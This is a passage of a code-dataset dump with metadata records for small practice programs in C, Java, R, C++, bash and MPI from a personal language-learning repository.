printf(\"a = %p\\n\", a);\n printf(\"a[0] = %p\\n\", a[0]);\n printf(\"&a[0][0] = %p\\n\", &a[0][0]);\n printf(\"&a[0][1] = %p\\n\", &a[0][1]);\n printf(\"&a[0][2] = %p\\n\", &a[0][2]);\n printf(\"a + 1 = %p\\n\", a + 1);\n printf(\"a[1] = %p\\n\", a[1]);\n printf(\"&a[1][0] = %p\\n\", &a[1][0]);\n}\n\n\n" }, { "alpha_fraction": 0.4783715009689331, "alphanum_fraction": 0.5182358026504517, "avg_line_length": 22.117647171020508, "blob_id": "2f4860ffc3b9093602df919f9c0003876ef80d80", "content_id": "fc6aabb5de49c236de51530f3455b9563e032274", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1191, "license_type": "permissive", "max_line_length": 83, "num_lines": 51, "path": "/java/projects/algorithms/chapter1/part1/Q27.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "/**\n * Q27\n */\nimport java.util.Map;\n\npublic class Q27 {\n public static void main(String[] args) {\n // binomial(100, 50, 0.25)\n // 调用次数 2 ^ 100 以上\n }\n\n public static double binomial(int N, int k, double p) {\n if (N == 0 && k == 0)\n return 1.0;\n if (N < 0 && k < 0)\n return 0.0;\n return (1.0 - p) * binomial(N - 1, k, p) + p * binomial(N - 1, k - 1, p);\n }\n\n public static double binomial(int N, int k, double p, Map<Index, Double> cache) {\n if (N == 0 && k == 0)\n return 1.0;\n if (N < 0 && k < 0)\n return 0.0;\n double left = 0, right = 0;\n Index leftKey = new Index(N - 1, k);\n if (cache.containsKey(leftKey)) {\n left = cache.get(leftKey).doubleValue();\n } else {\n left = binomial(N - 1, k, p, cache);\n cache.put(leftKey, left);\n }\n Index rightKey = new Index(N - 1, k -1);\n if (cache.containsKey(rightKey)) {\n right = cache.get(rightKey).doubleValue();\n } else {\n right = binomial(N - 1, k - 1, p, cache);\n cache.put(rightKey, right);\n }\n\n return (1.0 - p) * left + p * right;\n }\n}\n\nclass Index {\n int x, y;\n Index(int x, int y) {\n this.x = x;\n this.y = y;\n }\n}\n" }, { "alpha_fraction": 0.39182692766189575, "alphanum_fraction": 0.41826921701431274, "avg_line_length": 15.640000343322754, "blob_id": "151d774708bf433bff066a2d64f0993389959e33", "content_id": "e8602f8f218909dc922fd703c21cd0d4bfc48979", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 416, "license_type": "permissive", "max_line_length": 43, "num_lines": 25, "path": "/c/hardwork/hardway/3.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\nint a[500005];\nint n, m, z, x, y, t;\n\nvoid dodo(int n, int m) {\n for (int i = 0; i < n; i++) a[i] = i + 1;\n while (m--) {\n scanf(\"%d %d %d\", &z, &x, &y);\n }\n int index = a[0];\n for (int i = 0; i < n; i++) {\n printf(\"%d \", index);\n index = a[index];\n }\n putchar('\\n');\n}\n\nint main() {\n scanf(\"%d\", &t);\n while (t--) {\n scanf(\"%d %d\", &n, &m);\n dodo(n, m);\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.682539701461792, "alphanum_fraction": 0.682539701461792, "avg_line_length": 11.800000190734863, "blob_id": "71e656874f98235c180eecb4f019dcd1131c66bb", "content_id": "5a97abc06866e303a09083a598f5f0e3368b031d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 63, "license_type": "permissive", "max_line_length": 30, "num_lines": 5, "path": "/R/harwork/hardway/helloworld.R", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# HelloWorld In R\n\nm_str <- \"Mesekovic is lovely\"\n\nprint(m_str)" }, { "alpha_fraction": 0.5, "alphanum_fraction": 0.542553186416626, "avg_line_length": 14.666666984558105, "blob_id": "3b74ed4bfb9733564158fe413866e88910b6dced", "content_id": "b359fe804a8784af445d61d97642468ef5a3c92d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 94, "license_type": "permissive", "max_line_length": 28, "num_lines": 6, "path": "/c/hardwork/hardway/register_const.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\nint main() {\n register const int i = 10;\n i = 11;\n printf(\"%d\\n\", i);\n}\n" }, { "alpha_fraction": 0.5643564462661743, "alphanum_fraction": 0.5841584205627441, "avg_line_length": 16.545454025268555, "blob_id": "a66040f5520bebac8cd580b1717666b8c89a20da", "content_id": "2116d86c46ad7740dcdf7c9eb34482b19a39464b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 202, "license_type": "permissive", "max_line_length": 50, "num_lines": 11, "path": "/c/hardwork/library/string/strlen.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\r\n#include <string.h>\r\n\r\nint main() {\r\n\r\n int array[] = {1, 2, 3};\r\n // maybe will cause stackoverflow, but who cares\r\n printf(\"%lu\", strlen((char const *)array));\r\n\r\n return 0;\r\n}" }, { "alpha_fraction": 0.3407934904098511, "alphanum_fraction": 0.3502882421016693, "avg_line_length": 39.39725875854492, "blob_id": "d3ef50db3ec0af7d711a39706e6f033e3855674f", "content_id": "6dbb7075d799374ad45a527ebdc6a62bbcf53227", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 2949, "license_type": "permissive", "max_line_length": 60, "num_lines": 73, "path": "/c/hardwork/hardway/strcmp.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h> // for scanf() printf()\n#include <string.h> // fot strcmp()\n\nchar s0[30], c0[30];\nint main() {\n char a[49][2][30] = {{\"Alabama\", \"Montgomery\"},\n {\"Alaska\", \"Juneau\"},\n {\"Arizona\", \"Phoenix\"},\n {\"Arkansas\", \"Little Rock\"},\n {\"California\", \"Sacramento\"},\n {\"Colorado\", \"Denver\"},\n {\"Connecticut\", \"Hartford\"},\n {\"Delaware\", \"Dover\"},\n {\"Florida\", \"Tallahassee\"},\n {\"Georgia\", \"Atlanta\"},\n {\"Hawaii\", \"Honolulu\"},\n {\"Idaho\", \"Boise\"},\n {\"Illinois\", \"Springfield\"},\n {\"Maryland\", \"Annapolis\"},\n {\"Minnesota\", \"Saint Paul\"},\n {\"Iowa\", \"Des Moines\"},\n {\"Maine\", \"Augusta\"},\n {\"Kentucky\", \"Frankfort\"},\n {\"Indiana\", \"Indianapolis\"},\n {\"Kansas\", \"Topeka\"},\n {\"Louisiana\", \"Baton Rouge\"},\n {\"Oregon\", \"Salem\"},\n {\"Oklahoma\", \"Oklahoma City\"},\n {\"Ohio\", \"Columbus\"},\n {\"North Dakota\", \"Bismark\"},\n {\"New York\", \"Albany\"},\n {\"New Mexico\", \"Santa Fe\"},\n {\"New Jersey\", \"Trenton\"},\n {\"New Hampshire\", \"Concord\"},\n {\"Nevada\", \"Carson City\"},\n {\"Nebraska\", \"Lincoln\"},\n {\"Montana\", \"Helena\"},\n {\"Missouri\", \"Jefferson City\"},\n {\"Mississippi\", \"Jackson\"},\n {\"Massachusettes\", \"Boston\"},\n {\"Michigan\", \"Lansing\"},\n {\"Pennslyvania\", \"Harrisburg\"},\n {\"Rhode Island\", \"Providence\"},\n {\"South Carolina\", \"Columbia\"},\n {\"South Dakota\", \"Pierre\"},\n {\"Tennessee\", \"Nashville\"},\n {\"Texas\", \"Austin\"},\n {\"Utah\", \"Salt Lake City\"},\n {\"Vermont\", \"Montpelier\"},\n {\"Virginia\", \"Richmond\"},\n {\"Washington\", \"Olympia\"},\n {\"West Virginia\", \"Charleston\"},\n {\"Wisconsin\", \"Madison\"},\n {\"Wyoming\", \"Cheyenne\"}};\n int n = 0;\n int N = 0;\n scanf(\"%d\", &n);\n for (int i = 0; i < n; i++) {\n scanf(\"%s\", s0);\n scanf(\"%s\", c0);\n for (int j = 1; j < 49; j++) {\n if (0 == strcmp(s0, a[j][0])) {\n N = j;\n break;\n }\n }\n if (0 == strcmp(c0, a[N][1]))\n printf(\"Your anwswer is correct\\n\");\n else\n printf(\"The capital of %s is %s\\n\", a[N][0], a[N][1]);\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.5736433863639832, "alphanum_fraction": 0.604651153087616, "avg_line_length": 12, "blob_id": "734db0588112979b7ee269ff5d104fba03c1091b", "content_id": "6f14e43d013b4f5f48c4fd4f770563fe7dcb9e35", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 129, "license_type": "permissive", "max_line_length": 40, "num_lines": 10, "path": "/vala/makefile", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "CC = valac\nFlags = --pkg gtk+-3.0 --pkg gmodule-2.0\n\ninstall: timer\n\ntimer: timer.vala\n\t$(CC) $(Flags) $^ -o $@\n\nclean:\n\trm timer" }, { "alpha_fraction": 0.6977152824401855, "alphanum_fraction": 0.6988869309425354, "avg_line_length": 49.787879943847656, "blob_id": "09c8efcd6bcb424d81f3723eefb8933dfdc76997", "content_id": "869c3c209c62d0ec21927e9a7545bdb7bdaf8ee4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1812, "license_type": "permissive", "max_line_length": 599, "num_lines": 33, "path": "/c/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# C-Study\r\n> C (/siː/, as in the letter c) is a general-purpose, imperative computer programming language, supporting structured programming, lexical variable scope and recursion, while a static type system prevents many unintended operations. By design, C provides constructs that map efficiently to typical machine instructions, and therefore it has found lasting use in applications that had formerly been coded in assembly language, including operating systems, as well as various application software for computers ranging from supercomputers to embedded systems. (from wikipedia:C (programming language))\r\n\r\n![C_(programming_language)](./docs/The_C_Programming_Language_logo.svg.png)\r\n\r\n\r\n## Overview\r\n\r\n[Why learn C?](https://en.wikibooks.org/wiki/C_Programming/Why_learn_C%3F)\r\n+ C is the most commonly used programming language for writing operating systems. \r\n+ C will enable you to understand and appreciate an entire family of programming languages built upon the traditions of C. \r\n+ Knowledge of C enables freedom.\r\n\r\n## Structure\r\n```\r\n├── docs // documents\r\n├── hardwork\r\n│   ├── hardway // practice code\r\n│   ├── helloworld // first program\r\n│   ├── library // library usage example\r\n│   └── tips // some syntax tips\r\n├── projects\r\n│   ├── MPI // Message Passing Interface (MPI) in C\r\n│   ├── POSIX // The Portable Operating System Interface Library study\r\n│   ├── sniff // A mini package sniff program\r\n│   └── socket // TCP/UDP socket simple usage examples\r\n└── README.md\r\n```\r\n\r\n## Reference\r\n\r\n+ [C reference](http://en.cppreference.com/w/c)\r\n+ [C Language Features](http://www.c4learn.com/c-programming/c-features/)" }, { "alpha_fraction": 0.5042194128036499, "alphanum_fraction": 0.5042194128036499, "avg_line_length": 16.55555534362793, "blob_id": "a546b3e8030c7de313f427a02445e4843a163e47", "content_id": "17c5880546199f3c20afb6c102906e1dcea91154", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 474, "license_type": "permissive", "max_line_length": 44, "num_lines": 27, "path": "/c/hardwork/hardway/struct_node_to_list.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h> // for scanf() printf()\n#include <stdlib.h> // for malloc()\n\nstruct list {\n int num;\n struct list *next;\n};\ntypedef struct list list;\n\nint main() {\n int x;\n list *L, *p;\n L = (list *)malloc(sizeof(list));\n L->next = NULL;\n while (scanf(\"%d\", &x) != EOF) {\n p = (list *)malloc(sizeof(list));\n p->num = x;\n p->next = L->next;\n L->next = p;\n }\n \n p = L->next;\n while (p != NULL) {\n printf(\"%d\\n\", p->num);\n p = p->next;\n }\n}\n" }, { "alpha_fraction": 0.5634328126907349, "alphanum_fraction": 0.5634328126907349, "avg_line_length": 18.14285659790039, "blob_id": "fec0dc188282ba7f56f902cc3a7e53c86e72ef02", "content_id": "136f1e6f89e2b81f861f9874f875c824a567092a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 268, "license_type": "permissive", "max_line_length": 48, "num_lines": 14, "path": "/R/harwork/hardway/structure.R", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# structure\nflag <- TRUE\n\n# check whether there is flag in ls()\nhave_flag <- deparse(substitute(flag)) %in% ls()\n\nif (exists(deparse(substitute(flag)))) {\n print(\"find flag\")\n} else {\n for ( obj in ls() ) {\n cat(\"---\", obj, \"---\\n\")\n print(get(obj))\n }\n}\n" }, { "alpha_fraction": 0.6747427582740784, "alphanum_fraction": 0.6853634119033813, "avg_line_length": 27.158878326416016, "blob_id": "983dc1710e2e19bb8f8a2de13b86fbe7d48c8a5c", "content_id": "02fdbb6c050823738a25009323eac1da95264392", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3055, "license_type": "permissive", "max_line_length": 121, "num_lines": 107, "path": "/cplusplus/projects/Cocos2dx/hardwork/homework/week15/Classes/LoginScene.cpp", "repo_name": "jskyzero/Languages", "src_encoding": "GB18030", "text": "#pragma execution_character_set(\"UTF-8\")\n#include \"LoginScene.h\"\n#include \"cocostudio/CocoStudio.h\"\n#include \"json/rapidjson.h\"\n#include \"json/document.h\"\n#include \"json/writer.h\"\n#include \"json/stringbuffer.h\"\n#include \"Global.h\"\n#include \"GameScene.h\"\n#include <regex>\nusing std::to_string;\nusing std::regex;\nusing std::match_results;\nusing std::regex_match;\nusing std::cmatch;\nusing namespace rapidjson;\nUSING_NS_CC;\n\nusing namespace cocostudio::timeline;\n\n#include \"json/document.h\"\n#include \"json/writer.h\"\n#include \"json/stringbuffer.h\"\nusing namespace rapidjson;\n\nScene* LoginScene::createScene()\n{\n\t// 'scene' is an autorelease object\n\tauto scene = Scene::create();\n\n\t// 'layer' is an autorelease object\n\tauto layer = LoginScene::create();\n\n\t// add layer as a child to scene\n\tscene->addChild(layer);\n\n\t// return the scene\n\treturn scene;\n}\n\n// on \"init\" you need to initialize your instance\nbool LoginScene::init()\n{\n\t// 1. super init first\n\tif (!Layer::init())\n\t{\n\t\treturn false;\n\t}\n\n\tSize size = Director::getInstance()->getVisibleSize();\n\tvisibleHeight = size.height;\n\tvisibleWidth = size.width;\n\n\t// default user name, use to know can button be clicked\n\tconst string defaultUserName = \"Player Name\";\n\ttextField = TextField::create(defaultUserName, \"Arial\", 30);\n\ttextField->setPosition(Size(visibleWidth / 2, visibleHeight / 4 * 3));\n\tthis->addChild(textField, 2);\n\n\tauto button = Button::create();\n\tbutton->setTitleText(\"Login\");\n\tbutton->setTitleFontSize(30);\n\tbutton->setPosition(Size(visibleWidth / 2, visibleHeight / 2));\n\n\tbutton->addClickEventListener([&](Ref * sender) {\n\t\tauto userName = textField->getStringValue();\n\t\tif (!userName.empty())\n\t\t{\n\t\t\tauto request = new HttpRequest();\n\t\t\tauto postData = \"username=\" + userName;\n\n\t\t\trequest->setUrl(\"http://localhost:8080/login\");\n\t\t\trequest->setRequestType(HttpRequest::Type::POST);\n\t\t\trequest->setRequestData(postData.c_str(), strlen(postData.c_str()));\n\t\t\trequest->setResponseCallback([&](HttpClient *sender, HttpResponse * response) {\n\t\t\t\tif (!response) return;\n\t\t\t\tif (!response->isSucceed()) {\n\t\t\t\t\ttextField->setText(\"(っ °Д °;)っ:是不是服务器没开\");\n\t\t\t\t\treturn;\n\t\t\t\t}\n\t\t\t\trapidjson::Document document;\n\t\t\t\tdocument.Parse<0>(Global::vectorChar2String(response->getResponseData()).c_str());\n\t\t\t\tif (document.HasParseError()) {\n\t\t\t\t\ttextField->setText(\"(っ °Д °;)っ:后台君在玩蛇\");\n\t\t\t\t\treturn;\n\t\t\t\t}\n\t\t\t\tif (document.IsObject() && document.HasMember(\"result\")) {\n\t\t\t\t\tif (document[\"result\"].GetBool()) {\n\t\t\t\t\t\tGlobal::gameSessionId = Global::getSessionIdFromHeader(Global::vectorChar2String(response->getResponseHeader()));\n\t\t\t\t\t\t// go to game sence\n\t\t\t\t\t\tDirector::getInstance()->replaceScene(TransitionFade::create(1, GameScene::createScene(), Color3B(255, 255, 255)));\n\t\t\t\t\t}\n\t\t\t\t\telse {\n\t\t\t\t\t\tif (document.HasMember(\"info\")) {\n\t\t\t\t\t\t\ttextField->setText(document[\"info\"].GetString());\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t});\n\t\t\tcocos2d::network::HttpClient::getInstance()->send(request);\n\t\t\trequest->release();\n\t\t}\n\t});\n\tthis->addChild(button, 2);\n\n\treturn true;\n}\n" }, { "alpha_fraction": 0.4955752193927765, "alphanum_fraction": 0.5132743120193481, "avg_line_length": 13.125, "blob_id": "5b605088e5ef99e7823e6144d9bb4609c28070ce", "content_id": "8601e791954f4b602480f596e59b64e7c5a0d995", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 113, "license_type": "permissive", "max_line_length": 26, "num_lines": 8, "path": "/c/hardwork/hardway/define.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n\n#define foo(m, n) (m)* (n)\n\nint main() {\n printf(\"in main\\n\");\n printf(\"%d\", foo(1, 2));\n}\n" }, { "alpha_fraction": 0.5973352789878845, "alphanum_fraction": 0.6113989353179932, "avg_line_length": 21.53333282470703, "blob_id": "b135a486e6b2284d51095c72c9067758344a6e9e", "content_id": "a7e3caaa86272f9cdd5454ee8a179e5c5a2f9238", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1351, "license_type": "permissive", "max_line_length": 68, "num_lines": 60, "path": "/c/projects/POSIX/Lab2/2.1.fibonacci.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h> // for printf()\n#include <stdlib.h> // for atoi()\n#include <string.h> // for memset()\n#include <assert.h> // for assert()\n#include <pthread.h> // for pthread_*\n\n// int cal_size.py we can konw 50 is enough for 4byte signed integer\n#define ARRAY_SIZE 47\n\n// argument struct type\nstruct FIB_ARGU {\n int size;\n int array[ARRAY_SIZE];\n};\n\ntypedef struct FIB_ARGU FIB_ARGU_TYPE; \n\nvoid *calcute(void*);\n\n// main func\nint main(int argv, char *args[]) {\n // run with only one num \n if (argv != 2)\n printf(\"Usage: fibonacci size\\n\");\n\n // initial argument\n FIB_ARGU_TYPE argu;\n argu.size = atoi(args[1]);\n assert(argu.size >= 0);\n assert(argu.size < ARRAY_SIZE);\n assert(sizeof(argu.array) == sizeof(int) * ARRAY_SIZE);\n memset(argu.array, 0, sizeof(argu.array));\n argu.array[0] = 0;\n argu.array[1] = 1;\n\n // calcute \n pthread_t thread;\n pthread_attr_t attr;\n pthread_attr_init(&attr);\n assert( 0 == pthread_create(&thread, &attr, calcute, &argu));\n pthread_join(thread, NULL);\n\n // print ans\n for (int i = 0; i <= argu.size; i++) {\n printf(\"%d \", argu.array[i]);\n }\n puts(\"\");\n return 0;\n}\n\nvoid *calcute(void* argv) {\n\n FIB_ARGU_TYPE * data_p = (FIB_ARGU_TYPE *)argv;\n\n for (int i = 2; i <= data_p->size; i++) {\n data_p->array[i] = data_p->array[i-1] + data_p->array[i-2];\n }\n\n return NULL;\n}" }, { "alpha_fraction": 0.49699053168296814, "alphanum_fraction": 0.5038692951202393, "avg_line_length": 22.280000686645508, "blob_id": "1e9e02bec6f8c79a4bc9e3812e17490ef9833c21", "content_id": "d656ced200df937adb47363d864bbd3189e82e6a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1485, "license_type": "permissive", "max_line_length": 71, "num_lines": 50, "path": "/java/hardwork/tips/useStream.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "import java.util.Arrays; // for Arrays\nimport java.util.Random;\nimport java.util.Collection;\nimport java.util.List;\nimport java.util.stream.Collectors;\n\n/**\n * useStream\n * \n * Stream 使用一种类似用 SQL 语句从数据库查询数据的直观方式来提供一种对 Java 集合运算\n * 和表达的高阶抽象。\n * \n */\n\n// +--------------------+ +------+ +------+ +---+ +-------+\n// | stream of elements +-----> |filter+-> |sorted+-> |map+-> |collect|\n// +--------------------+ +------+ +------+ +---+ +-------+\n\n// 生成流 \n// 流的来源。 可以是集合,数组,I/O channel, 产生器generator 等。\n// \n// stream() − 为集合创建串行流。\n// stream() − 为集合创建串行流。\n\n\n// 聚合操作\n// \n// forEach 迭代流中的每个数据\n// map 映射每个元素到对应的结果\n// filter 通过设置的条件过滤出元素\n// limit 获取指定数量的流\n// sorted 对流进行排序\n\n// Collectors\n// \n// Collectors 类实现了很多归约操作,例如将流转换成集合和聚合元素。\n\n\npublic class useStream {\n public static void main(String [] args) {\n (new Random()).ints()\n .limit(100)\n .filter(x -> x > 0 && x % 2 == 0)\n .map(x -> x % 10)\n .mapToObj(Integer::new).collect(Collectors.toList())\n .parallelStream()\n .sorted()\n .forEach(x -> System.out.println((int)x));\n }\n}" }, { "alpha_fraction": 0.309230774641037, "alphanum_fraction": 0.36769232153892517, "avg_line_length": 23.074073791503906, "blob_id": "a2ab72dc9cdf189f16a6e687b3d73d98e2b05501", "content_id": "a4e85b7933ecb7d6bca01f0505c00a2b7321a892", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 650, "license_type": "permissive", "max_line_length": 46, "num_lines": 27, "path": "/c/hardwork/hardway/marks_and_ranks.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\nfloat a[105];\nint b[6];\nint main() {\n int n;\n scanf(\"%d\", &n);\n double temp = 0;\n int min = 0;\n int max = 0;\n for (int i = 0; i < n; i++) {\n scanf(\"%f\", &a[i]);\n temp += a[i];\n if (a[i] > a[max]) max = i;\n if (a[i] < a[min]) min = i;\n if ((a[i] >= 0) && (a[i] < 60)) b[1]++;\n if ((a[i] >= 60) && (a[i] < 75)) b[2]++;\n if ((a[i] >= 75) && (a[i] < 85)) b[3]++;\n if ((a[i] >= 85) && (a[i] < 95)) b[4]++;\n if ((a[i] >= 95) && (a[i] <= 100)) b[5]++;\n }\n temp = (temp - a[max] - a[min]) / (n - 2);\n printf(\"%.2lf\\n\", temp);\n for (int i = 1; i <= 5; i++) {\n printf(\"%d\\n\", b[i]);\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.5135593414306641, "alphanum_fraction": 0.5203390121459961, "avg_line_length": 21.653846740722656, "blob_id": "d6be114e45428727e2997b4c7a19b719f9b7fb3d", "content_id": "45bd97681795fb153a35b2968329a54df42472fb", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 590, "license_type": "permissive", "max_line_length": 58, "num_lines": 26, "path": "/bash/example/count_code_line.sh", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# all file ext type\nfile_types=\"sh c h cpp cs md hs java py pl PS1 R rkt vala\"\n# ralative path\nrelative_path=\"../../\"\n# save all numbers\ntotal_num=0\n\n\n# travel all type in types\nfor type in $file_types\ndo\n # regex_str=$(printf \".*\\.*\\.\\(%s\\)$\" $type)\n regex_str=\".*\\.*\\.\\($type\\)$\"\n num_str=$(find $relative_path | \\\n grep -p $regex_str | \\\n awk '!/venv/' | \\\n xargs -I {1} cat {1} | \\\n wc -l)\n echo $type \"\\t\" $num_str\n num=$(echo $num_str | \\\n sed 's/ //g')\n total_num=$((total_num+num))\ndone\n\necho ---\necho total \"\\t\" $total_num\n\n" }, { "alpha_fraction": 0.8228782415390015, "alphanum_fraction": 0.8450184464454651, "avg_line_length": 29.22222137451172, "blob_id": "4327bbdf70c813d5137cce121bbaa79afeb4c110", "content_id": "c2e1a8d06b2f8c9a51b48e6b6596ae80f4bf804a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 271, "license_type": "permissive", "max_line_length": 42, "num_lines": 9, "path": "/java/projects/gridworld/sonar-project.properties", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "sonar.projectKey=Part4\nsonar.projectName=Part4\nsonar.projectVersion=1.0\nsonar.sourceEncoding=UTF-8\nsonar.modules=java-module\njava-module.sonar.projectName=Java Mudule \njava-module.sonar.language=java \njava-module.sonar.sources=.\njava-module.sonar.projectBaseDir=Part4_sub" }, { "alpha_fraction": 0.40595611929893494, "alphanum_fraction": 0.46865203976631165, "avg_line_length": 17.22857093811035, "blob_id": "897d3c4a9f5a1979542c09995548355ba87d75f0", "content_id": "d61d175bdee01b40cbd9b504d95fd5aa66fdb92c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 638, "license_type": "permissive", "max_line_length": 58, "num_lines": 35, "path": "/c/hardwork/hardway/prefix.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h> // for printf()\n#include <string.h>\n\nchar a[10005];\nchar* p;\nchar* prefix(const char* const s1, const char* const s2) {\n for (int i = 0; i < 10005; i++) {\n a[i] = 0;\n }\n int n1 = strlen(s1);\n int n2 = strlen(s2);\n int n3 = n2 < n1 ? n2 : n1;\n int n4 = 0;\n for (int i = 0; i < n3; i++) {\n n4 = i;\n if (s1[i] == s2[i])\n a[i] = s1[i];\n else\n break;\n }\n if (0 == n4)\n return a;\n else\n return a;\n}\nint main() {\n char s1[] = \"distance\";\n char s2[] = \"tlike\";\n char* p = prefix(s1, s2);\n for (int i = 0; p[i] != '\\0'; i++) {\n printf(\"%c\", p[i]);\n }\n putchar('\\n');\n return 0;\n}\n" }, { "alpha_fraction": 0.46666666865348816, "alphanum_fraction": 0.48571428656578064, "avg_line_length": 8.454545021057129, "blob_id": "5d757649066c272d60c718ed14bdcdb70d2aabee", "content_id": "2c6cbc043161d3c2ddde16953f9a06c557e9db06", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 105, "license_type": "permissive", "max_line_length": 17, "num_lines": 11, "path": "/c/hardwork/hardway/main_func.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include<stdio.h>\nint i;\nint main() {\n\twhile(i<=5){\n\t\tprintf(\"A\\n\");\n\t\ti++;\n\t\tmain();\n\t}\n\t\n\treturn 0;\n} \n" }, { "alpha_fraction": 0.5607344508171082, "alphanum_fraction": 0.5790960192680359, "avg_line_length": 21.15625, "blob_id": "dc37443b544c26b938e2b4482d34eee90928e847", "content_id": "3a0bc4a2c0178414aba443b9b3ef827fd7873c7b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 774, "license_type": "permissive", "max_line_length": 93, "num_lines": 32, "path": "/c/projects/MPI/hardway/MPI_boardcast.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "// 一个进程的数据被发送到通信子中的所有进程,这样的集合通信叫做广播。\n\n#include <mpi.h>\n#include <stdio.h>\n\nint main(int argc, char **argv) {\n int myid, numprocs;\n int source = 0;\n int array[5] = {0, 0, 0, 0, 0};\n int i;\n\n MPI_Init(&argc, &argv);\n\n MPI_Comm_rank(MPI_COMM_WORLD, &myid);\n MPI_Comm_size(MPI_COMM_WORLD, &numprocs);\n\n if (myid == source) {\n for (i = 1; i <= 5; i++) array[i] = i;\n }\n\n // int MPI_Bcast(void* buffer, int count, MPI_Datatype datatype, int source, MPI_Comm comm)\n MPI_Bcast(array, 5, MPI_INT, source, MPI_COMM_WORLD);\n\n if (myid != source) {\n printf(\"In process %d, \", myid);\n for (i = 0; i < 5; i++) printf(\"arr[%d]=%d\\t\", i, array[i]);\n printf(\"\\n\");\n }\n\n MPI_Finalize();\n return 0;\n}" }, { "alpha_fraction": 0.5611775517463684, "alphanum_fraction": 0.5942962169647217, "avg_line_length": 24.302326202392578, "blob_id": "54cf03c85b360375afe905b9f6b787a486ca4043", "content_id": "2585631dee08b9fe07e980b79f18704e2da31895", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1179, "license_type": "permissive", "max_line_length": 82, "num_lines": 43, "path": "/c/projects/MPI/hardway/MPI_group_ranks.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "// 如果知道了在组MPI_COMM_WORLD中某些进程的编号,\n// 如何根据这些编号来操作在不同组的同一进程来完成不同的任务呢?\n\n#include <mpi.h>\n#include <stdio.h>\n\nint main(int argc, char **argv) {\n int myid, numprocs;\n MPI_Group group_world, group1, group2;\n int i;\n int ranks1[10];\n int ranks2[10];\n int ranks_output[10];\n\n MPI_Init(&argc, &argv);\n\n MPI_Comm_rank(MPI_COMM_WORLD, &myid);\n MPI_Comm_size(MPI_COMM_WORLD, &numprocs);\n\n MPI_Comm_group(MPI_COMM_WORLD, &group_world);\n\n for (i = 0; i < numprocs - 1; i++) {\n ranks1[i] = i;\n ranks2[i] = i + 1;\n }\n\n MPI_Group_incl(group_world, numprocs - 1, ranks1, &group1);\n MPI_Group_incl(group_world, numprocs - 1, ranks2, &group2);\n\n // int MPI_Group_translate_ranks(MPI_Group group1, int count, int *ranks1, \n // MPI_Group group2, int *ranks2)\n MPI_Group_translate_ranks(group1, numprocs - 1, ranks1,\n group2, ranks_output);\n\n if (myid == 0) {\n for (i = 0; i < numprocs - 1; i++) {\n printf(\"The group1 rank %d in group2 is: %d\\n\", ranks1[i], ranks_output[i]);\n }\n }\n\n MPI_Finalize();\n return 0;\n}" }, { "alpha_fraction": 0.5068672299385071, "alphanum_fraction": 0.5094833374023438, "avg_line_length": 19.66216278076172, "blob_id": "7dbc06388a42191e3c382e891853d79fa4a19659", "content_id": 